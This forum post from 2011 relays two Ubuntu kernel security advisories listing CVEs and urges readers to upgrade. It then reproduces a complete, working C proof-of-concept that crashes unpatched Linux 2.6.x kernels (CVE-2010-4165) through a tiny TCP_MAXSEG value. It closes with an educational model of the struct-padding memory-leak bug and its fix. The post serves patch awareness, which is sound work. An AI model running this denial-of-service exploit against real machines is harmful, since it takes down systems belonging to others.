Flubber Posted March 2, 2011

The upgrade to 2.6.32-29 has already been done. Whoever runs Ubuntu: update && upgrade.

[USN-1080-1] Linux kernel vulnerabilities (Ubuntu 10.04 LTS)

Details follow:

Thomas Pollet discovered that the RDS network protocol did not check certain iovec buffers. A local attacker could exploit this to crash the system or possibly execute arbitrary code as the root user. (CVE-2010-3865)

Vasiliy Kulikov discovered that the Linux kernel X.25 implementation did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3875)

Vasiliy Kulikov discovered that the Linux kernel sockets implementation did not properly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3876)

Vasiliy Kulikov discovered that the TIPC interface did not correctly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3877)

Nelson Elhage discovered that the Linux kernel IPv4 implementation did not properly audit certain bytecodes in netlink messages. A local attacker could exploit this to cause the kernel to hang, leading to a denial of service. (CVE-2010-3880)

It was discovered that multithreaded exec did not handle CPU timers correctly. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2010-4248)

Krishna Gudipati discovered that the bfa adapter driver did not correctly initialize certain structures. A local attacker could read files in /sys to crash the system, leading to a denial of service. (CVE-2010-4343)

Tavis Ormandy discovered that the install_special_mapping function could bypass the mmap_min_addr restriction. A local attacker could exploit this to mmap 4096 bytes below the mmap_min_addr area, possibly improving the chances of performing NULL pointer dereference attacks. (CVE-2010-4346)

It was discovered that the ICMP stack did not correctly handle certain unreachable messages. If a remote attacker were able to acquire a socket lock, they could send specially crafted traffic that would crash the system, leading to a denial of service. (CVE-2010-4526)

Dan Rosenberg discovered that the OSS subsystem did not handle name termination correctly. A local attacker could exploit this to crash the system or gain root privileges. (CVE-2010-4527)

Dan Carpenter discovered that the Infiniband driver did not correctly handle certain requests. A local user could exploit this to crash the system or potentially gain root privileges. (CVE-2010-4649, CVE-2011-1044)

[USN-1081-1] Linux kernel vulnerabilities (Ubuntu 10.10)

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well.

Details follow:

It was discovered that KVM did not correctly initialize certain CPU registers. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2010-3698)

Thomas Pollet discovered that the RDS network protocol did not check certain iovec buffers. A local attacker could exploit this to crash the system or possibly execute arbitrary code as the root user. (CVE-2010-3865)

Vasiliy Kulikov discovered that the Linux kernel X.25 implementation did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3875)

Vasiliy Kulikov discovered that the Linux kernel sockets implementation did not properly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3876)

Vasiliy Kulikov discovered that the TIPC interface did not correctly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-3877)

Nelson Elhage discovered that the Linux kernel IPv4 implementation did not properly audit certain bytecodes in netlink messages. A local attacker could exploit this to cause the kernel to hang, leading to a denial of service. (CVE-2010-3880)

Dan Rosenberg discovered that the ivtv V4L driver did not correctly initialize certain structures. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-4079)

Dan Rosenberg discovered that the semctl syscall did not correctly clear kernel memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2010-4083)

It was discovered that multithreaded exec did not handle CPU timers correctly. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2010-4248)

Nelson Elhage discovered that Econet did not correctly handle AUN packets over UDP. A local attacker could send specially crafted traffic to crash the system, leading to a denial of service. (CVE-2010-4342)

Tavis Ormandy discovered that the install_special_mapping function could bypass the mmap_min_addr restriction. A local attacker could exploit this to mmap 4096 bytes below the mmap_min_addr area, possibly improving the chances of performing NULL pointer dereference attacks. (CVE-2010-4346)

Dan Rosenberg discovered that the OSS subsystem did not handle name termination correctly. A local attacker could exploit this to crash the system or gain root privileges. (CVE-2010-4527)

Dan Carpenter discovered that the Infiniband driver did not correctly handle certain requests. A local user could exploit this to crash the system or potentially gain root privileges. (CVE-2010-4649, CVE-2011-1044)

As for Linux Kernel <= 2.6.37:

/* Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165)
 * =======================================================
 * A divide by 0 error occurs in tcp_select_initial_window
 * when processing user supplied TCP_MAXSEG facilitating a
 * local denial-of-service condition (kernel oops!) in all
 * Linux Kernel 2.6.x branch (2.6.37 & below). This issue
 * can be triggered easily with a call to setsockopt() on
 * a listening network socket and then establishing a TCP
 * connection to the awaiting socket.
 *
 * -- prdelka
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>        /* memset */
#include <unistd.h>        /* fork, sleep */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/tcp.h>

int main(void)
{
    int optval, ret, sd, sd2, pid;
    struct sockaddr_in locAddr;
    struct sockaddr_in servAddr;
    struct sockaddr_in dstAddr;
    socklen_t sin_size = sizeof(struct sockaddr_in);

    printf("[ Linux Kernel tcp_select_initial_window divide by 0 DoS\n");

    /* Listener on 0.0.0.0:60000, and the loopback address we will connect to. */
    sd = socket(AF_INET, SOCK_STREAM, 0);
    memset(&servAddr, 0, sizeof(servAddr));
    memset(&dstAddr, 0, sizeof(dstAddr));
    servAddr.sin_family = AF_INET;
    servAddr.sin_port = htons(60000);
    servAddr.sin_addr.s_addr = INADDR_ANY;
    dstAddr.sin_family = AF_INET;
    inet_aton("127.0.0.1", &dstAddr.sin_addr);
    dstAddr.sin_port = htons(60000);

    if (bind(sd, (struct sockaddr *)&servAddr, sizeof(servAddr)) == -1) {
        printf("[ Cannot bind listener service\n");
        exit(-1);
    }
    listen(sd, 4);

    /* The trigger: a tiny user MSS on the listening socket. A patched
     * kernel rejects it (setsockopt fails), a vulnerable one accepts it. */
    optval = 12;
    ret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &optval, sizeof(optval));
    if (ret == 0) {
        printf("[ System is not patched against CVE-2010-4165\n[ Goodnight, sweet prince.\n");
        switch (pid = fork()) {
        case 0:
            /* child: wait for the connection on the poisoned listener */
            sd = accept(sd, (struct sockaddr *)&locAddr, &sin_size);
            sleep(3);
            break;
        default:
            /* parent: connecting to the listener drives the kernel into
             * tcp_select_initial_window with the bad MSS */
            sd2 = socket(AF_INET, SOCK_STREAM, 0);
            connect(sd2, (struct sockaddr *)&dstAddr, sizeof(dstAddr));
            sleep(3);
        }
        return 0;
    }
    printf("[ System is patched, no dreams for this prince\n");
    return 0;
}

Sources (in order):
1] Full Disclosure: [USN-1080-1] Linux kernel vulnerabilities
2] Full Disclosure: [USN-1081-1] Linux kernel vulnerabilities
3] Linux Kernel <= 2.6.37 Local Kernel Denial of Service
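Several of the advisory entries above (CVE-2010-3875, -3876, -3877, -4079 and -4083) are the same bug class: a kernel handler fills only the fields it cares about in a structure on its stack and then copies the whole structure to user space, so struct padding and any field it forgot to write carry stale kernel stack bytes out to the caller. The following is an added example, not code from the post or from the Linux kernel: a user-space C model of that class. The struct reply layout, the 0xAA "stale stack" marker and the fill_reply_* handlers are assumptions chosen to make the leak visible and countable; the only real-world element is the fix pattern (clear the whole object before filling it), which is the shape the kernel fixes for these entries took.

```c
/* Added example: user-space model of the "did not correctly initialize
 * certain structures" kernel info-leak class. Not kernel code. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* Stand-in for whatever an earlier syscall left on the kernel stack
 * (assumption: a fixed marker, so leaked bytes can be counted). Real
 * leaks hold pointers, canaries or fragments of other users' data. */
#define STALE_BYTE 0xAA

/* Hypothetical reply structure (assumption, not a real kernel ABI):
 * a byte followed by a 32-bit field leaves 3 padding bytes on the usual
 * ABIs, and 'reserved' is a field the handler never writes. */
struct reply {
    uint8_t  kind;
    uint32_t value;
    uint32_t reserved;
};

/* Vulnerable pattern: set the named fields, copy the whole object out.
 * Padding and 'reserved' keep whatever the stack held before. */
static void fill_reply_vulnerable(struct reply *r)
{
    r->kind  = 1;
    r->value = 0x11223344u;
}

/* Fixed pattern: clear the entire object before filling it. */
static void fill_reply_fixed(struct reply *r)
{
    memset(r, 0, sizeof *r);
    r->kind  = 1;
    r->value = 0x11223344u;
}

/* Model of the kernel path: the handler's struct lives in a stack slot
 * that still holds stale bytes, then sizeof(struct reply) bytes are
 * copied to user space (copy_to_user in the kernel; memcpy here).
 * Returns how many stale bytes reached user_buf, i.e. the leak size. */
static size_t run_handler(void (*fill)(struct reply *),
                          uint8_t user_buf[sizeof(struct reply)])
{
    union {
        struct reply r;
        uint8_t raw[sizeof(struct reply)];
    } slot;
    size_t i, leaked = 0;

    memset(slot.raw, STALE_BYTE, sizeof slot.raw);  /* dirty stack slot */
    fill(&slot.r);                                  /* handler runs */
    memcpy(user_buf, slot.raw, sizeof slot.raw);    /* copy_to_user() */

    for (i = 0; i < sizeof slot.raw; i++)
        if (user_buf[i] == STALE_BYTE)
            leaked++;
    return leaked;
}

size_t leak_bytes_vulnerable(void)
{
    uint8_t buf[sizeof(struct reply)];
    return run_handler(fill_reply_vulnerable, buf);
}

size_t leak_bytes_fixed(void)
{
    uint8_t buf[sizeof(struct reply)];
    return run_handler(fill_reply_fixed, buf);
}

/* Bytes the vulnerable handler actually writes; every other byte of the
 * structure (padding plus 'reserved') is leaked. */
size_t bytes_written_by_handler(void)
{
    return sizeof(((struct reply *)0)->kind) +
           sizeof(((struct reply *)0)->value);
}

int main(void)
{
    uint8_t buf[sizeof(struct reply)];
    size_t i, n;

    n = run_handler(fill_reply_vulnerable, buf);
    printf("vulnerable: %zu of %zu bytes are stale stack data:", n, sizeof buf);
    for (i = 0; i < sizeof buf; i++)
        printf(" %02x", buf[i]);
    printf("\n");

    n = run_handler(fill_reply_fixed, buf);
    printf("fixed:      %zu of %zu bytes are stale stack data:", n, sizeof buf);
    for (i = 0; i < sizeof buf; i++)
        printf(" %02x", buf[i]);
    printf("\n");
    return 0;
}
```

Build with gcc -Wall -o leak leak.c and run it; on an LP64 or ILP32 build the vulnerable handler leaks 7 of 12 bytes (3 padding, 4 reserved) and the fixed handler leaks none. The count is derived from sizeof(struct reply) minus the bytes written, so it stays correct on an ABI with different padding. The practical lesson is the one behind the advisory: any structure that is copied to user space must be fully initialized, not just the fields the handler sets, because field-by-field stores do not clear padding.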